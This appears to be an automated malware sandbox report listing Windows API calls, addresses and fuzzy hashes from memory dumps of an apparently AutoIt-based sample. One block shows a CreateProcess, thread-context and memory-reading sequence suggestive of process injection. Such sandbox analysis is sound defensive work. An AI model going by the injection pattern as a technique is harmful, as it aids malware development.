                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_
                                                                                  • String ID:
                                                                                  • API String ID: 1144537725-0
                                                                                  • Opcode ID: 42eaf64185f0a12267895f8575f29ab9e3427d4a27c0c326203db485746c5b89
                                                                                  • Instruction ID: 2712a3784b45b20232cbb78925c3dd9d5c086a7f5150da118a9f7cea3f87bf99
                                                                                  • Opcode Fuzzy Hash: 42eaf64185f0a12267895f8575f29ab9e3427d4a27c0c326203db485746c5b89
                                                                                  • Instruction Fuzzy Hash: FE31D270504301DFD321DF65E889B9BBBF8FB59308F000A6EF5A983240E771AA54CB96
                                                                                  APIs
                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01684BD5
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01684BF9
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01684C1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 2438371351-0
                                                                                  • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                  • Instruction ID: edb2ce356bdd80cbf446ec76393b60a52a385e3d2681e381a41dcaf5fa82b154
                                                                                  • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                  • Instruction Fuzzy Hash: 6E12CF24E24658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction ID: ad66ab9efc7d11e141df65c50833b672092c646e54ddaa3f4330d2faf908f9fc
                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                  • Instruction Fuzzy Hash: BD311674A00109DBC718CF59D480969F7A2FF49304B2482AAE80ACF751D731EED2DBC0
                                                                                  APIs
                                                                                    • Part of subcall function 001C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E9C
                                                                                    • Part of subcall function 001C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001C4EAE
                                                                                    • Part of subcall function 001C4E90: FreeLibrary.KERNEL32(00000000,?,?,001C4EDD,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EC0
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4EFD
                                                                                    • Part of subcall function 001C4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E62
                                                                                    • Part of subcall function 001C4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001C4E74
                                                                                    • Part of subcall function 001C4E59: FreeLibrary.KERNEL32(00000000,?,?,00203CDE,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4E87
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$Load$AddressFreeProc
                                                                                  • String ID:
                                                                                  • API String ID: 2632591731-0
                                                                                  • Opcode ID: f305552d6d25f7ad635352d916765175ec1ef8b0adcc37797632d06e0b1245cc
                                                                                  • Instruction ID: 4f66ee109a09313e8a4216b88a8f1834ffbae58bf5cf255914e8e6f4b55f5f3c
                                                                                  • Opcode Fuzzy Hash: f305552d6d25f7ad635352d916765175ec1ef8b0adcc37797632d06e0b1245cc
                                                                                  • Instruction Fuzzy Hash: DE112731614305ABDB14EF64DC12FAD77A59F70B10F20842EF442A61D1EF74EA549790
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wsopen_s
                                                                                  • String ID:
                                                                                  • API String ID: 3347428461-0
                                                                                  • Opcode ID: f0a870a2b3adfb37c31e23e656bab8998a696a5e4797dd77321b910a79698f4a
                                                                                  • Instruction ID: 06d2ab318dd0f1cb38a3b507849b358dec3ba45cc38644dc58ee2fb5cd6d2359
                                                                                  • Opcode Fuzzy Hash: f0a870a2b3adfb37c31e23e656bab8998a696a5e4797dd77321b910a79698f4a
                                                                                  • Instruction Fuzzy Hash: CE11187590420EAFCB05DF58E941AAE7BF5EF48314F154059F908AB312DB31EA21CBA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                  • Instruction ID: f8a4d31194a05f93f207b4a3ebec3a7c69067a3fad9a118b7b60bb8535104a68
                                                                                  • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                  • Instruction Fuzzy Hash: 15F0F432511E5897CB313B6B9C05B6E33D89F76334F100719FA20931D2EB70D8028AA5
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 92ee61bb9246094b25be1c6d0c98b9368376e182b676209b33b023d6e6b22730
                                                                                  • Instruction ID: 631b8540c1dcaa8cd36fcfbe8fe3fa525fb97e6037693663d46d708c6fb4220e
                                                                                  • Opcode Fuzzy Hash: 92ee61bb9246094b25be1c6d0c98b9368376e182b676209b33b023d6e6b22730
                                                                                  • Instruction Fuzzy Hash: 59E0E53110066DA7D62126779D04BBE3648AB827F0F150225BE24925D0DB29DD0191E0
                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,?,00291418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001C4F6D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 21deeac49a757ec221d09eaafe1e9fbbf9508b931994f4b856d0c4098d57bc84
                                                                                  • Instruction ID: e9fe8b369b57dcfb59768ec8714b829326685e5707e278ac766a8c5fdb72e53d
                                                                                  • Opcode Fuzzy Hash: 21deeac49a757ec221d09eaafe1e9fbbf9508b931994f4b856d0c4098d57bc84
                                                                                  • Instruction Fuzzy Hash: 65F03071109751CFDB389F68D4A4E16B7E4AF24319320897EE1DA82511C731D844DF50
                                                                                  APIs
                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001C2DC4
                                                                                    • Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LongNamePath_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 541455249-0
                                                                                  • Opcode ID: 1d8daf65caab410c502ba62da20a6cd1b7c8bcdcb67203f8acbed5b331cbdf57
                                                                                  • Instruction ID: 9b0da1c530023d5734e8a11e390baf79f0b3cdb06a301c19b1020e6d6ed67a48
                                                                                  • Opcode Fuzzy Hash: 1d8daf65caab410c502ba62da20a6cd1b7c8bcdcb67203f8acbed5b331cbdf57
                                                                                  • Instruction Fuzzy Hash: A1E0CD726003245BC720D2589C09FEA77DDDFC8790F040075FD09E7248DA70ED808550
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock
                                                                                  • String ID:
                                                                                  • API String ID: 2638373210-0
                                                                                  • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                  • Instruction ID: 592fb3e430a755235fae379242aa78deb486821a1a728582f0e49405a38b34c0
                                                                                  • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                  • Instruction Fuzzy Hash: 76E048F0609B009FDF3D5E28A8517B677D89F49300F00045EF59B82252E57268558A4D
                                                                                  APIs
                                                                                    • Part of subcall function 001C3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001C3908
                                                                                    • Part of subcall function 001CD730: GetInputState.USER32 ref: 001CD807
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 001C2B6B
                                                                                    • Part of subcall function 001C30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001C314E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                  • String ID:
                                                                                  • API String ID: 3667716007-0
                                                                                  • Opcode ID: b44e2d7cb26366966af9ba89df15eeb03602746ec83d742709630611909e7b4d
                                                                                  • Instruction ID: 8bf1fea48a9c0e9469fd624879179a6bee6b5fafe2c3fec760fe85e429ac6b4b
                                                                                  • Opcode Fuzzy Hash: b44e2d7cb26366966af9ba89df15eeb03602746ec83d742709630611909e7b4d
                                                                                  • Instruction Fuzzy Hash: A1E0262230030807CA04BB71B81AF7DB3498BF5311F40553EF05243162CF34C9664251
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,00200704,?,?,00000000,?,00200704,00000000,0000000C), ref: 002003B7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 88c518864a4e13f195031b00a5680258869b3ec871430c065cbdc467f92dd500
                                                                                  • Instruction ID: 0720295fddca3022506c46010f9268e960cd6fecd709dc0ea9f4baaf97a77b9c
                                                                                  • Opcode Fuzzy Hash: 88c518864a4e13f195031b00a5680258869b3ec871430c065cbdc467f92dd500
                                                                                  • Instruction Fuzzy Hash: 26D06C3204020DBFDF028F84ED06EDA3BAAFB48714F118000BE1856020C732E821AB94
                                                                                  APIs
                                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001C1CBC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoParametersSystem
                                                                                  • String ID:
                                                                                  • API String ID: 3098949447-0
                                                                                  • Opcode ID: 2c66b6bba4316e9436b945ec97be67f93790591c761e494e9527d58b8dc281b9
                                                                                  • Instruction ID: 4c1f891bee607bf468d6f7b0fa4632854cbf2df8665cc7188e5f18de1ea8d2d2
                                                                                  • Opcode Fuzzy Hash: 2c66b6bba4316e9436b945ec97be67f93790591c761e494e9527d58b8dc281b9
                                                                                  • Instruction Fuzzy Hash: EFC0923A280305EFF2188BD0FC4EF107764E348B01F948002F60DB95E3E3B22824EA58
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(000001F4), ref: 016853B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708037599.0000000001683000.00000040.00000020.00020000.00000000.sdmp, Offset: 01683000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1683000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction ID: 1fbf3eb4b4e6dbfcb83c526dbe2e576ff72301c925eaec867cfb014da50f4dc9
                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                  • Instruction Fuzzy Hash: 27E0E67494010DDFDB00EFB4D94969D7BB4EF04301F100261FD01D2280D6709D508A62
                                                                                  APIs
                                                                                    • Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2
                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0025961A
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0025965B
                                                                                  • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0025969F
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002596C9
                                                                                  • SendMessageW.USER32 ref: 002596F2
                                                                                  • GetKeyState.USER32(00000011), ref: 0025978B
                                                                                  • GetKeyState.USER32(00000009), ref: 00259798
                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002597AE
                                                                                  • GetKeyState.USER32(00000010), ref: 002597B8
                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002597E9
                                                                                  • SendMessageW.USER32 ref: 00259810
                                                                                  • SendMessageW.USER32(?,00001030,?,00257E95), ref: 00259918
                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0025992E
                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00259941
                                                                                  • SetCapture.USER32(?), ref: 0025994A
                                                                                  • ClientToScreen.USER32(?,?), ref: 002599AF
                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002599BC
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002599D6
                                                                                  • ReleaseCapture.USER32 ref: 002599E1
                                                                                  • GetCursorPos.USER32(?), ref: 00259A19
                                                                                  • ScreenToClient.USER32(?,?), ref: 00259A26
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00259A80
                                                                                  • SendMessageW.USER32 ref: 00259AAE
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00259AEB
                                                                                  • SendMessageW.USER32 ref: 00259B1A
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00259B3B
                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00259B4A
                                                                                  • GetCursorPos.USER32(?), ref: 00259B68
                                                                                  • ScreenToClient.USER32(?,?), ref: 00259B75
                                                                                  • GetParent.USER32(?), ref: 00259B93
                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00259BFA
                                                                                  • SendMessageW.USER32 ref: 00259C2B
                                                                                  • ClientToScreen.USER32(?,?), ref: 00259C84
                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00259CB4
                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00259CDE
                                                                                  • SendMessageW.USER32 ref: 00259D01
                                                                                  • ClientToScreen.USER32(?,?), ref: 00259D4E
                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00259D82
                                                                                    • Part of subcall function 001D9944: GetWindowLongW.USER32(?,000000EB), ref: 001D9952
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00259E05
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                  • String ID: @GUI_DRAGID$F$p#)
                                                                                  • API String ID: 3429851547-2847612385
                                                                                  • Opcode ID: 126b583246bde045ce83edfda7638113d83bd11ac061d5cfc04a04bf5113c29b
                                                                                  • Instruction ID: 3b8862bddb4468ebde03316c7d8b195e5a8812f3289cd174d73582fe3dcaf388
                                                                                  • Opcode Fuzzy Hash: 126b583246bde045ce83edfda7638113d83bd11ac061d5cfc04a04bf5113c29b
                                                                                  • Instruction Fuzzy Hash: F5429E30614302EFDB25CF24DD48AAABBE9FF49311F10061AF959872A1D771D8A8DF49
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002548F3
                                                                                  • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00254908
                                                                                  • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00254927
                                                                                  • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0025494B
                                                                                  • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0025495C
                                                                                  • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0025497B
                                                                                  • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002549AE
                                                                                  • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002549D4
                                                                                  • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00254A0F
                                                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00254A56
                                                                                  • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00254A7E
                                                                                  • IsMenu.USER32(?), ref: 00254A97
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00254AF2
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00254B20
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00254B94
                                                                                  • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00254BE3
                                                                                  • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00254C82
                                                                                  • wsprintfW.USER32 ref: 00254CAE
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00254CC9
                                                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00254CF1
                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00254D13
                                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00254D33
                                                                                  • GetWindowTextW.USER32(?,00000000,00000001), ref: 00254D5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                                  • String ID: %d/%02d/%02d
